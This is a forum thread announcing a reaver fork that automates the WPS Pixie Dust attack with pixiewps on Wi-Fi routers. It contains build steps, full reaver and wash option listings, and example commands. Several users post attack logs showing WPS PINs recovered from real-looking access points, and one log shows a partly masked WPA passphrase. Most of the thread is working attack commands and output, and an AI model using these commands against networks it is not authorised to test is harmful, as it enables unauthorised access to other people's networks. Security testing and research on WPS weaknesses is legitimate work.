Hello

The community has made modifications in reaver for him to do the pixie dust attack and automate the process to recover the pin.

Other attacks were implemented (Pin Generator) and some improvements have been made.

The development is constant and anyone is welcome to help



Here is our contribution

GitHub
https://github.com/t6x/reaver-wps-fork-t6x



Overview

reaver-wps-fork-t6x is a modification done from a fork of reaver (ht tps://code.google.com/p/reaver-wps-fork/)

This modified version uses the attack Pixie Dust to find the correct pin number of wps

The attack used in this version was developed by Wiire (ht tps://github.com/wiire/pixiewps)



Install Required Libraries and Tools

Libraries for reaver


sudo apt-get install libpcap-dev aircrack-ng sqlite3 libsqlite3-dev

Tools


You must have installed the pixiewps created by Wiire (ht tps://github.com/wiire/pixiewps)



Compile and Install


Build Reaver

cd reaver-wps-fork-t6x-master
cd src
./configure
make

Install Reaver

sudo make install



Usage - Reaver


Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire

Required Arguments:
-i, --interface=<wlan> Name of the monitor-mode interface to use
-b, --bssid=<mac> BSSID of the target AP

Optional Arguments:
-m, --mac=<mac> MAC of the host system
-e, --essid=<ssid> ESSID of the target AP
-c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
-o, --out-file=<file> Send output to a log file [stdout]
-s, --session=<file> Restore a previous session file
-C, --exec=<command> Execute the supplied command upon successful pin recovery
-D, --daemonize Daemonize reaver
-a, --auto Auto detect the best advanced options for the target AP
-f, --fixed Disable channel hopping
-5, --5ghz Use 5GHz 802.11 channels
-v, --verbose Display non-critical warnings (-vv for more)
-q, --quiet Only display critical messages
-K --pixie-dust=<number> [1] Run pixiewps with PKE, PKR, E-Hash1, E-Hash2, E-Nonce and Authkey (Ralink, Broadcom, Realtek)
-Z, --no-auto-pass Do NOT run reaver to auto retrieve WPA password if pixiewps attack is successful
-h, --help Show help

Advanced Options:
-p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin
-d, --delay=<seconds> Set the delay between pin attempts [1]
-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
-g, --max-attempts=<num> Quit after num pin attempts
-x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
-r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts
-t, --timeout=<seconds> Set the receive timeout period [5]
-T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
-A, --no-associate Do not associate with the AP (association must be done by another application)
-N, --no-nacks Do not send NACK messages when out of order packets are received
-S, --dh-small Use small DH keys to improve crack speed
-L, --ignore-locks Ignore locked state reported by the target AP
-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
-n, --nack Target AP always sends a NACK [Auto]
-w, --win7 Mimic a Windows 7 registrar [False]
-X, --exhaustive Set exhaustive mode from the beginning of the session [False]
-1, --p1-index Set initial array index for the first half of the pin [False]
-2, --p2-index Set initial array index for the second half of the pin [False]
-P, --pixiedust-loop Set into PixieLoop mode (doesn't send M4, and loops through to M3) [False]
-W, --generate-pin Default Pin Generator by devttys0 team [1] Belkin [2] D-Link

Example:
reaver -i mon0 -b 00:AA:BB:11:22:33 -vv -K 1


Option (K)


The -K option 1 runs pixiewps with PKE, PKR, E-Hash1, E-Hash2, E-Nonce and the Authkey. pixiewps will try to attack Ralink, Broadcom and Realtek

*Special note: if you are attacking a Realtek AP, do NOT use small DH Keys (-S)


Option (P)


Option (-P) in reaver puts reaver into a loop mode that does not do the WPS protocol to or past the M4 message to hopefully avoid lockouts. This is to ONLY be used for PixieHash collecting to use with pixiewps, NOT to 'online' bruteforce pins.
This option was made with intent of:

- Collecting repetitive hashes for further comparison and or analysis / discovery of new vulnerable chipsets , routers etc..

- Time sensistive attacks where the hash collecting continues repetitively until your time frame is met.

- For scripting purposes of whom want to use a possible lockout preventable way of PixieHash gathering for your Use case.


Usage - wash


Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire

Required Arguments:
-i, --interface=<iface> Interface to capture packets on
-f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files

Optional Arguments:
-c, --channel=<num> Channel to listen on [auto]
-o, --out-file=<file> Write data to file
-n, --probes=<num> Maximum number of probes to send to each AP in scan mode [15]
-D, --daemonize Daemonize wash
-C, --ignore-fcs Ignore frame checksum errors
-5, --5ghz Use 5GHz 802.11 channels
-s, --scan Use scan mode
-u, --survey Use survey mode [default]
-P, --file-output-piped Allows Wash output to be piped. Example. wash x|y|z...
-g, --get-chipset Pipes output and runs reaver alongside to get chipset
-h, --help Show help

Example:
wash -i mon0



Example


Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire

[+] Switching mon0 to channel 1
[?] Restore previous session for A.:9.:D.:....:....:...? [n/Y] n
[+] Waiting for beacon from A.:9.:D.:....:....:...
[+] Associated with A.:9.:D.:....:....:.... (ESSID: ......)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: c6:66:a6:72:37:6d:......
[P] PKE: 10:cf:cc:88:99:4b:15:de:a6:b3:26:fe:93:24:......
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Number: RT2860
[P] WPS Model Serial Number: A978FD123BC
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:......
[P] AuthKey: bf:68:34:b5:ce:e2:a1:24:dc:15:01:1c:78:9e:74:..... .
[+] Sending M2 message
[P] E-Hash1: 2e:d5:17:16:36:b8:c2:bb:d1:14:7c:18:cf:89:58:b8:1d :9d:39:......
[P] E-Hash2: 94:fb:41:53:55:b3:8e:1c:fe:2b:a3:9b:b5:82:11:..... .
[Pixie-Dust]
[Pixie-Dust] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] PSK1: dd:09:bd:24:......
[Pixie-Dust] PSK2: 77:e0:dd:00:......
[Pixie-Dust] [+] WPS pin: 9178....
[Pixie-Dust]
[Pixie-Dust] Time taken: 0 s
[Pixie-Dust]
Running the reaver with the correct pin wait ...

[Reaver Test] BSSID: A.:9.:D.:3.:..:..
[Reaver Test] Channel: 1
[Reaver Test] [+] WPS PIN: '9178....'
[Reaver Test] [+] WPA PSK: '112233'
[Reaver Test] [+] AP SSID: '....'



# wash -i mon0 -g -c 2
XX:XX:XX:XX:XX:XX| 1|-68|1.0|No |AAA| D-Link| DIR-615
XX:XX:XX:XX:XX:XX| 1|-58|1.0|No |CCC| ASUSTeK Computer Inc.| RT-N56U



Any problem and suggestion, contact someone who is helping in the project

i like that way you think. it makes everything easier on the long run -good job!

but get your sources right ;) :

perfekt example:
https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-%28Offline-WPS-Attack%29

hi :)
thank you very much for your great contribution!!!!!!
TNX

Awesome Sauce !! Nice job indeed.

When run from root I get error below. yes I did sudo make install after compile.

root@kali:~# reaver -i mon0 -b 08:**:0C:**:F4:** -vv -S -N -K1

Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]>

[+] Waiting for beacon from 08:**:0C:**:F4:**
[+] Switching mon0 to channel 1
[+] Associated with 08:**:0C:**:F4:** (ESSID: TG1672GE2)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 91:80:26:70:44:a0:80:c9:f1:93:f7:f8:44:88:f0:b7
[P] PKE: fa:6b:67:04:ce:29:9b:e7:9f:2d:7c:8b:9e:c5:9d:3b:1e :84:5c:cb:64:93:02:bb:29:3e:d0:5b:32:04:70:98:dc:d 1:38:75:e3:68:54:5e:8f:3f:62:44:0c:08:06:89:58:a7: ba:08:59:91:7b:ee:63:e4:74:6a:47:de:f1:87:1c:ea:4d :47:2e:db:fe:41:51:e7:13:a2:55:85:b4:4d:98:d5:46:a a:4f:54:56:fe:4a:9a:b9:21:57:d8:ec:31:d6:61:b6:fe: 55:e7:77:39:40:bc:d7:18:29:b8:c4:47:25:aa:3b:06:d7 :f4:9a:72:72:cb:b4:30:a1:49:a7:97:b6:37:2f:76:4a:3 d:c9:1d:0c:f1:75:ea:58:62:cc:a8:53:78:bf:93:fa:50: eb:5e:4f:2a:59:6e:ba:07:b5:d2:d7:b5:ca:2d:a4:57:3c :7a:87:61:26:dc:52:64:50:11:0e:4c:90:74:40:50:ae:9 f:a5:b9:c1:9e:3f:38:93:a4
[P] WPS Manufacturer: Celeno Communication, Inc.
[P] WPS Model Number: CL1800
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:02
[P] AuthKey: e1:21:a3:c4:34:de:bb:59:e2:8c:49:74:58:8e:79:f0:2f :b8:29:07:af:3d:62:2f:2a:9c:9e:61:9e:02:08:f0
[+] Sending M2 message
[P] E-Hash1: dc:fc:c2:c3:93:65:d6:15:f1:b6:3d:67:f3:39:61:0f:22 :aa:78:a3:5d:41:eb:6d:67:fd:fc:bf:83:d4:f3:ee
[P] E-Hash2: ad:95:ea:36:96:ec:bc:16:47:b6:b6:d1:49:90:e4:eb:d7 :cd:20:ff:84:92:d0:b2:fc:e0:75:37:d8:4d:92:0c
[Pixie-Dust]
[Pixie-Dust]
ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]
ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]
PSK1: 4a:72:15:42:21:4b:69:ef:10:a4:41:bd:df:75:01:a8
[Pixie-Dust]
PSK2: 24:85:d0:a8:e4:20:c5:9d:04:d7:da:67:a6:df:af:3f
[Pixie-Dust] [+] WPS pin: 8127****
[Pixie-Dust]
[Pixie-Dust]
Time taken: 0 s
[Pixie-Dust]
Running the reaver with the correct pin wait ...

[Reaver Test] BSSID: 08:**:0C:**:F4:**
[Reaver Test] Channel: 1
sh: 1: ./reaver: not found

When run from src directory It works........

root@kali:~/reaver-wps-fork-t6x-master/src# reaver -i mon0 -b 08:**:0C:**:F4:** -vv -S -N -K1

Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]>

[+] Waiting for beacon from 08:**:0C:**:F4:**
[+] Switching mon0 to channel 1
[+] Associated with 08:**:0C:**:F4:** (ESSID: TG1672GE2)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: aa:c5:79:80:9d:3b:cc:46:7a:d5:c9:f5:b5:20:ae:bf
[P] PKE: fa:6b:67:04:ce:29:9b:e7:9f:2d:7c:8b:9e:c5:9d:3b:1e :84:5c:cb:64:93:02:bb:29:3e:d0:5b:32:04:70:98:dc:d 1:38:75:e3:68:54:5e:8f:3f:62:44:0c:08:06:89:58:a7: ba:08:59:91:7b:ee:63:e4:74:6a:47:de:f1:87:1c:ea:4d :47:2e:db:fe:41:51:e7:13:a2:55:85:b4:4d:98:d5:46:a a:4f:54:56:fe:4a:9a:b9:21:57:d8:ec:31:d6:61:b6:fe: 55:e7:77:39:40:bc:d7:18:29:b8:c4:47:25:aa:3b:06:d7 :f4:9a:72:72:cb:b4:30:a1:49:a7:97:b6:37:2f:76:4a:3 d:c9:1d:0c:f1:75:ea:58:62:cc:a8:53:78:bf:93:fa:50: eb:5e:4f:2a:59:6e:ba:07:b5:d2:d7:b5:ca:2d:a4:57:3c :7a:87:61:26:dc:52:64:50:11:0e:4c:90:74:40:50:ae:9 f:a5:b9:c1:9e:3f:38:93:a4
[P] WPS Manufacturer: Celeno Communication, Inc.
[P] WPS Model Number: CL1800
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:02
[P] AuthKey: 0a:6b:15:aa:53:0d:c3:5f:56:bc:46:3a:a1:1a:89:26:ba :51:5b:1b:f6:9f:92:b3:c2:87:61:0b:e8:ce:c1:57
[+] Sending M2 message
[P] E-Hash1: 81:7e:70:4a:1e:62:f8:1f:d4:92:f3:60:0d:ea:52:a0:37 :ca:75:e3:43:03:ca:fa:2b:60:5d:bf:33:03:9b:d8
[P] E-Hash2: 82:c1:62:2c:ff:00:81:f6:46:14:44:f3:2f:f8:f1:95:60 :73:da:1d:b6:8e:fc:bb:f0:cd:ff:f9:ce:25:76:63
[Pixie-Dust]
[Pixie-Dust]
ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]
ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]
PSK1: dc:64:ee:9b:dc:4e:39:e5:9c:a7:f4:82:d5:b1:e2:8d
[Pixie-Dust]
PSK2: 1d:7b:f9:0d:9c:0a:d8:a7:68:7e:3f:47:7b:59:e8:f9
[Pixie-Dust] [+] WPS pin: 8127****
[Pixie-Dust]
[Pixie-Dust]
Time taken: 0 s
[Pixie-Dust]
Running the reaver with the correct pin wait ...

[Reaver Test] BSSID: 08:**:0C:**:F4:**
[Reaver Test] Channel: 1
[Reaver Test] [+] WPS PIN: '8127****'
[Reaver Test] [+] WPA PSK: 'TG1672GD8****'
[Reaver Test] [+] AP SSID: 'TG1672GE2'

Probably my fault, just post my result, great job

Probably my fault, just post my result, great job

ops, forgot to commit to the github lol, is my fault sorry

Commit done

sorry for that

I add a new option (-Z), with the -Z option he does not try to catch the pass automatically, it stops executing when it finishes running the pixiewps

I will add another option to have an option to output data to file, when you're ready I give commits

I will improve a bit the initial post

sorry again.

U Fixed it. :cool:

-Z works correctly also

Job well done =).

Thank you very much, g0tmi1k



New version available

-P Option of the wash created by t6x(displays the output of the wash with pipes)


root @ kali: ~ / # wash -i mon0 -P
XX: XX: XX: XX: XX: XX | 1 | -64 | 1.0 | No | Wifi1
XX: XX: XX: XX: XX: XX | 2 | -53 | 1.0 | No | Wifi2


-P Option of reaver created by DataHead (M3 Loop)


Reaver remains in the loop M3 stage

Nice work....
-P option works great, take less screen space if multiple terminals running.

wash -i wlan1mon -P
00:00:00:00:1E:90| 1|-60|1.0|Yes|DG1600000
00:00:00:00:62:6C| 1|-55|1.0|No |Kirin00000
00:00:00:00:46:00| 1|-59|1.0|Yes|DG1600000
00:00:00:00:5C:C0| 1|-46|1.0|No |DG160000
00:00:00:00:5B:6F| 1|-64|1.0|No |PS00000
00:00:00:00:23:97| 1|-63|1.0|No |TH0000
00:00:00:00:A9:5E| 1|-57|1.0|No |DVW000000
00:00:00:00:08:86| 4|-58|1.0|Yes|H0000
00:00:00:00:37:56| 6|-47|1.0|No |133 00000
00:00:00:00:AD:00| 6|-47|1.0|No |Tomm00000
00:00:00:00:07:00| 6|-58|1.0|Yes|Tupp000000
00:00:00:00:AD:18| 6|-62|1.0|No |McP000000
00:00:00:00:4E:50| 6|-52|1.0|No |DG10000000
00:00:00:00:52:A1| 6|-57|1.0|No |133 00000
00:00:00:00:B6:D0| 6|-45|1.0|No |We he0000000
00:00:00:00:93:21| 8|-55|1.0|No |Trou0000000
00:00:00:00:A2:70| 9|-52|1.0|No |TG160000000
00:00:00:00:3E:6B|11|-41|1.0|No |DVW0000000
00:00:00:00:9F:00|11|-66|1.0|No |SterlingWattersDraperPrice
00:00:00:00:07:10|11|-47|1.0|Yes|DG0000000
00:00:00:00:03:D9|11|-55|1.0|No |NET000000
00:00:00:00:E8:86|11|-54|1.0|No |9060000000
00:00:00:00:81:F0|11|-49|1.0|Yes|TG0000000
00:00:00:00:A7:86|11|-30|1.0|No |b0c50000000
00:00:00:00:45:00|11|-60|1.0|No |Pan000000

Maybe make change on your fork GitHub page:

Build Reaver

cd reaver-1.4 to cd reaver-wps-fork-t6x-master
cd src
./configure
make

Install Reaver

sudo make install

Also thanks for the credit.... :D but u typo my name. :(


Question/Idea
if option -K1 fail, does it automatically try -K2 or K3?
if -K3 fail, does it check -K1 etc?

or

user must enter new command line each time?

Another idea... have all the extra stuff print only with verbosity mode selected :D

Update: I'm getting a segmentation fault when I use -K 1 and -K 3



root@Kali:~# reaver -i mon0 -c 1 -b B4:75:0E:XX:XX:XX -vv -a -K 3 -P

Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]>
mod by DataHead

[+] Switching mon0 to channel 1
[+] Waiting for beacon from B4:75:0E:XX:XX:XX
[+] Associated with B4:75:0E:XX:XX:XX (ESSID: *****)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 6b:35:4d:6f:05:8e:9c:80:55:68:25:4f:17:42:31:0d
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Belkin International
[P] WPS Model Number: F9K1105 v2
[+] Received M1 message
[P] PKR: dc:4c:e3:b4:b2:4a:d1:e8:39:3c:bf:b8:f1:e6:01:ab:2a :3c:6b:0d:7b:07:71:5c:b9:08:b4:e4:65:c1:4a:0b:71:1 1:90:24:66:05:57:6a:48:9b:ba:ae:20:20:5b:e2:83:92: b0:9d:bb:d3:7c:9f:44:e7:af:72:50:c2:76:7d:ac:34:62 :62:4e:3b:f3:35:7e:e5:03:c2:7d:36:76:df:91:45:71:a 0:32:04:0f:9b:92:85:18:0c:d8:c1:d5:e4:fd:17:07:26: 47:36:49:37:80:80:e6:14:c9:50:76:3b:7a:38:99:5f:35 :96:1c:53:2a:0d:8f:ab:48:b0:1f:1a:21:06:27:41:2b:b 0:26:13:79:e7:a9:51:e7:cd:e1:95:f1:c9:a9:7b:84:8c: c5:ea:4e:27:14:bb:30:01:87:a9:d9:c0:07:0d:81:e0:62 :a8:38:70:d0:3d:54:8e:49:9c:1c:e8:42:4a:ea:0f:73:f 1:a7:80:01:31:e2:14:02:4e
[P] AuthKey: 03:c2:33:e0:d1:66:13:c1:d8:8f:a5:00:59:db:fc:8e:40 :5d:2d:de:d7:8d:b4:97:ea:d9:c0:75:3d:71:c9:37
[+] Sending M2 message
[P] E-Hash1: 3a:9e:57:08:f3:fb:e1:ef:13:22:98:34:40:af:ef:cb:f7 :00:ba:48:2b:7d:34:18:7f:c0:2d:80:9b:c2:7e:96
[P] E-Hash2: 3c:70:b6:aa:df:50:a8:e3:c8:e7:20:7e:bd:01:38:2e:63 :4f:e4:9f:c8:26:fe:23:0c:2c:e6:67:16:08:e1:71
Segmentation fault

No segmentation fault for me, however

If no pin found ok, then exit


root@kali:~# reaver -i wlan3mon -b C4:.............. -vv -a -K3 -P

Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]>
mod by DataHead

[+] p1_index set to 1
[+] p2_index set to 0
[+] Restored previous session
[+] Waiting for beacon from C4:..............
[+] Switching wlan3mon to channel 1
[+] Switching wlan3mon to channel 2
[+] Switching wlan3mon to channel 3
[+] Switching wlan3mon to channel 4
[+] Switching wlan3mon to channel 5
[+] Switching wlan3mon to channel 6
[+] Associated with C4:.............. (ESSID: TP-*********)
[+] Starting Cracking Session. Pin count: 1, Max pin attempts: 11000
[+] Trying pin 00005678.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: dc:71:07:21:ab:fd:d2:8e:9a:63:b0:1c:e3:43:2f:6e
[P] PKE: 7b:4b:4f:84:3c:94:ef:c9:64:39:c8:f6:43:3d:ce:24:8f :c7:5a:f1:c8:49:e4:b0:29:35:e0:d4:e9:10:ee:a4:85:c 6:07:50:98:cf:49:18:a7:31:c3:85:2a:cd:ec:82:57:fd: f6:60:8c:78:18:2b:d4:39:95:04:d8:73:ac:43:60:d9:4d :06:ae:b9:0f:62:47:a6:f9:70:80:79:7d:45:3f:0a:00:f b:d0:44:f2:f7:5b:62:12:5d:7f:ce:4d:e4:5c:d3:47:10: 9a:f7:5c:8b:46:a7:93:dc:04:4f:15:7e:e4:3a:77:20:b4 :a4:45:a4:6b:9b:a5:61:c0:e9:c3:55:bc:e3:39:8e:82:d f:24:1f:15:e7:f1:a9:86:6e:b7:7a:35:a5:26:5a:28:ef: 0e:94:39:2c:18:ce:ca:3d:93:a5:b3:a5:80:f3:e7:33:13 :ec:88:9c:60:69:b7:04:14:ca:d2:07:b1:7c:cf:67:43:7 2:0a:66:65:29:90:bf:59:94
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Number: 1.0
[+] Received M1 message
[P] PKR: b9:de:9f:be:19:9a:92:78:4b:fc:b1:0f:dc:0d:5b:db:e6 :b2:85:c6:96:1d:f1:93:66:59:06:53:7d:62:01:7d:bf:9 6:3c:8e:ed:c8:e6:08:f1:4a:48:c2:a5:f6:08:51:8e:1b: 01:38:69:b0:d4:cd:d9:ef:1d:f0:4e:82:46:b3:cf:19:aa :1c:2e:e5:dc:4e:10:7c:71:c3:69:77:32:fe:2f:27:dc:d 9:0e:20:2f:64:55:2d:58:d0:79:ee:dd:7d:70:04:13:62: 3f:c3:39:c0:32:f5:83:3c:80:ba:b6:b6:37:9b:89:12:05 :65:52:65:ac:e4:1f:fb:2c:31:aa:da:d4:f3:36:b1:04:2 e:e0:a8:bd:4d:68:ca:13:98:2b:32:eb:81:ee:7c:e8:8d: ae:95:6e:06:08:4c:b2:f6:cc:26:c7:7a:7b:e3:03:f5:17 :30:8a:c7:22:93:5c:79:d9:11:d0:73:8c:37:44:72:33:7 0:49:c6:ba:3d:0c:50:56:42
[P] AuthKey: c9:6a:f4:8d:ea:95:40:09:31:59:15:ee:fd:8c:f4:84:2b :e7:6c:b1:89:8f:80:c8:a4:85:71:d4:57:e8:b5:75
[+] Sending M2 message
[P] E-Hash1: 32:2d:a3:b9:96:e3:a6:5e:92:ad:93:33:9a:08:00:d9:be :87:b8:a1:ee:9d:70:6f:c3:5d:2e:91:63:ab:d6:dc
[P] E-Hash2: 55:95:0f:16:3c:33:bb:c8:31:2f:ff:f6:c3:45:09:ee:e3 :ba:f9:d6:f9:15:c0:36:69:3b:1c:e2:9d:f8:cd:25
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust]
Time taken: 0 s
[Pixie-Dust]

But if pin found, hangs

root@kali:~# reaver -i wlan3mon -b 8C:.......... -vv -a -K3 -P

Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]>
mod by DataHead

[+] Waiting for beacon from 8C:..........
[+] Switching wlan3mon to channel 1
[+] Switching wlan3mon to channel 2
[+] Switching wlan3mon to channel 3
[+] Switching wlan3mon to channel 4
[+] Switching wlan3mon to channel 5
[+] Switching wlan3mon to channel 6
[+] Switching wlan3mon to channel 7
[+] Switching wlan3mon to channel 9
[+] Associated with 8C:.......... (ESSID: TG167*****)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 2c:62:2f:3c:6f:e9:d4:75:92:a3:d3:e4:59:a0:92:bc
[P] PKE: db:4c:8c:5d:1c:61:a0:b5:dd:4c:4b:6a:0a:59:02:c2:46 :af:29:53:d4:14:77:9e:b4:0f:48:bc:95:40:6e:ed:e4:9 a:08:46:29:78:a4:fe:6a:e2:45:65:73:cf:01:b1:4c:34: 60:fa:87:30:7b:d2:6a:7a:fc:7d:7d:2f:8e:55:ab:43:e7 :e9:87:31:2a:dc:08:e6:3e:2b:d3:80:93:ab:5c:c4:c5:9 3:07:6d:19:85:f1:39:56:55:6b:93:bb:ce:09:72:e6:b5: 76:00:bb:ea:f7:04:ad:2d:71:83:2a:21:a5:dd:68:1f:dc :a4:88:6b:8c:8a:4d:39:a0:53:a1:3c:2c:c5:15:4c:15:0 3:db:f7:01:e6:fd:22:05:17:0d:86:07:44:c7:18:8c:9d: b7:fc:13:8a:0c:01:7b:38:c8:ca:05:99:e3:1f:4a:07:10 :9b:19:b5:03:02:56:32:30:1a:57:b5:db:92:48:c1:f3:3 e:45:e8:60:c4:ef:2e:87:79
[P] WPS Manufacturer: Celeno Communication, Inc.
[P] WPS Model Number: CL1800
[+] Received M1 message
[P] PKR: 04:10:d7:4d:a0:29:b4:8e:00:85:85:47:cd:bc:5f:84:da :c0:c8:4a:f2:36:8c:56:5c:00:28:a8:90:31:14:11:0e:2 4:d8:e2:fe:8f:58:db:8c:f1:28:f9:e3:81:f7:93:2a:2e: 10:3c:f5:ec:55:ba:95:a0:87:73:c6:83:00:f2:1f:e0:00 :80:6c:c9:1f:5c:76:6f:27:df:c9:25:21:58:e5:24:c8:2 6:80:67:d4:18:ab:68:79:bd:06:ac:b9:0b:7d:75:68:52: 99:0c:c3:1c:30:1c:80:a1:c1:49:5a:29:b6:ac:98:b5:b6 :c3:c4:fe:67:80:02:ae:9f:f7:ef:34:41:02:39:e5:f6:6 b:ec:73:19:b5:be:75:ed:ed:ac:d6:e4:0c:68:7a:b8:a7: a6:fe:98:9e:7f:00:3a:78:b3:69:df:9c:13:fc:8f:50:58 :01:31:5a:1b:8c:81:5d:47:99:1b:d9:0a:8b:b0:49:6f:9 b:1a:af:25:31:c5:10:13:8c
[P] AuthKey: eb:35:cb:40:af:86:fd:1d:8d:bb:2e:8b:82:f8:02:e5:3d :19:3b:9d:6a:2d:52:d2:97:49:dd:97:48:e6:41:db
[+] Sending M2 message
[P] E-Hash1: b9:76:ae:bd:db:d4:18:bc:2d:31:2f:24:02:d5:c4:a6:82 :15:2e:00:da:de:98:dd:4e:a9:bd:fc:ee:b4:bc:cd
[P] E-Hash2: a3:9b:6a:34:d8:39:7f:9e:07:21:68:b3:67:ed:82:42:08 :61:e4:25:96:6d:4d:93:d6:ba:1f:38:aa:3f:09:0f
[Pixie-Dust]
[Pixie-Dust]
ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]
ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]
PSK1: b5:33:92:d2:5f:d2:d3:4a:ae:cb:81:db:c9:f6:63:a6
[Pixie-Dust]
PSK2: bb:f8:7f:74:54:1c:8b:74:e8:2a:3f:d3:c2:57:4e:36
[Pixie-Dust] [+] WPS pin: 50..........
[Pixie-Dust]
